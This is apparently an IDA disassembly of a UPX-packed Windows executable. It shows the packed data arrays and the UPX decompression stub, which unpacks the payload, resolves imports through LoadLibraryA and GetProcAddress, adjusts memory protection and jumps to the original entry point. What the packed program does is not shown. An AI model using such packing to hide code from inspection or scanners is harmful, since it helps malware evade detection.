dd 740B1D09h, 123E1B55h, 13290812h, 150B0526h, 0BFFFDFEEh
dd 0E44001Ah, 32371A07h, 3D2F5A42h, 35013A32h, 5D354B3Ah
dd 0EDEDFB7Fh, 4C102B0Ch, 6381542h, 19091B19h, 702C4B2Eh
dd 4E0C2914h, 77FFFBAEh, 13060B19h, 14285C08h, 41571B15h
dd 6A103F11h, 334122Ch, 0DBFFB66Bh, 27723822h, 1B160E24h
dd 16120506h, 8941130Ah, 0BB6F6363h, 0E1F397Fh, 0B1A280Ch
dd 2C2A131Fh, 11100D07h, 5FF21F3Dh, 455000E2h, 4014CD5h
dd 2E49D300h, 200E046h, 0F6CD66D7h, 8010B01h, 130C1E0Ch
dd 9CB604AAh, 3105D7Dh, 0B400D30h, 6C330402h, 70B3749h
dd 161E600Ch, 10ECD92Fh, 6F06072Bh, 5E5920E5h, 503C325Ch
dd 0C900BAC8h, 1CA701D4h, 9AF7BE1Eh, 65742E1Fh, 24CB7478h
dd 8504EB90h, 23C2EEE8h, 722ECD20h, 7D851664h, 0AFB6E41h
dd 27222303h, 0DD7BB3B0h, 262E0240h, 73021C10h, 2DD6FB9Fh
dd 654FC016h, 5B636F6Ch, 4DFB5027h, 264F60C9h, 32B41B42h
dd 0F0000023h, 512C4A67h, 480000h, 0FF0000h, 0
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_AC = byte ptr -0ACh
pusha
mov esi, offset dword_406000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_407262
; ---------------------------------------------------------------------------
align 8
loc_407258: ; CODE XREF: start:loc_407269�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40725E: ; CODE XREF: start+B6�j start+CD�j
add ebx, ebx
jnz short loc_407269
loc_407262: ; CODE XREF: start+10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407269: ; CODE XREF: start+20�j
jb short loc_407258
mov eax, 1
loc_407270: ; CODE XREF: start+3F�j start+4A�j
add ebx, ebx
jnz short loc_40727B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40727B: ; CODE XREF: start+32�j
adc eax, eax
add ebx, ebx
jnb short loc_407270
jnz short loc_40728C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_407270
loc_40728C: ; CODE XREF: start+41�j
xor ecx, ecx
sub eax, 3
jb short loc_4072A0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_407312
mov ebp, eax
loc_4072A0: ; CODE XREF: start+51�j
add ebx, ebx
jnz short loc_4072AB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4072AB: ; CODE XREF: start+62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_4072B8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4072B8: ; CODE XREF: start+6F�j
adc ecx, ecx
jnz short loc_4072DC
inc ecx
loc_4072BD: ; CODE XREF: start+8C�j start+97�j
add ebx, ebx
jnz short loc_4072C8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4072C8: ; CODE XREF: start+7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_4072BD
jnz short loc_4072D9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4072BD
loc_4072D9: ; CODE XREF: start+8E�j
add ecx, 2
loc_4072DC: ; CODE XREF: start+7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_4072FC
loc_4072ED: ; CODE XREF: start+B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_4072ED
jmp loc_40725E
; ---------------------------------------------------------------------------
align 4
loc_4072FC: ; CODE XREF: start+AB�j start+C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_4072FC
add edi, ecx
jmp loc_40725E
; ---------------------------------------------------------------------------
loc_407312: ; CODE XREF: start+5C�j
pop esi
mov edi, esi
mov ecx, 76h
loc_40731A: ; CODE XREF: start+E1�j start+E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40731F: ; CODE XREF: start+104�j
cmp al, 1
ja short loc_40731A
cmp byte ptr [edi], 1
jnz short loc_40731A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_40731F
lea edi, [esi+5000h]
loc_40734C: ; CODE XREF: start+12E�j
mov eax, [edi]
or eax, eax
jz short loc_40738E
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+703Ch]
xchg eax, ebp
loc_407369: ; CODE XREF: start+146�j
mov al, [edi]
inc edi
or al, al
jz short loc_40734C
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+7040h]
or eax, eax
jz short loc_407388
mov [ebx], eax
add ebx, 4
jmp short loc_407369
; ---------------------------------------------------------------------------
loc_407388: ; CODE XREF: start+13F�j
call dword ptr [esi+7048h]
loc_40738E: ; CODE XREF: start+110�j
add edi, 4
lea ebx, [esi-4]
loc_407394: ; CODE XREF: start+170�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_4073BF
cmp al, 0EFh
ja short loc_4073B2
loc_4073A1: ; CODE XREF: start+17D�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_407394
; ---------------------------------------------------------------------------
loc_4073B2: ; CODE XREF: start+15F�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_4073A1
; ---------------------------------------------------------------------------
loc_4073BF: ; CODE XREF: start+15B�j
mov ebp, [esi+7044h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1EFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp+2Ch+var_AC]
loc_4073F3: ; CODE XREF: start+1B7�j
push 0
cmp esp, eax
jnz short loc_4073F3
sub esp, 0FFFFFF80h
jmp sub_402908
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 408000h
dd 3 dup(0)
dd 8058h, 803Ch, 3 dup(0)
dd 8065h, 8050h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0
aJW db 'jÉÔw',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aUser32_dll db 'USER32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74726956h, 506C6175h, 65746F72h, 7463h
dd 74697845h, 636F7250h, 737365h, 73770000h, 6E697270h
dd 416674h, 7000h, 0Ch, 3242h, 3CFh dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 409000h
align 2000h
_idata2 ends
end start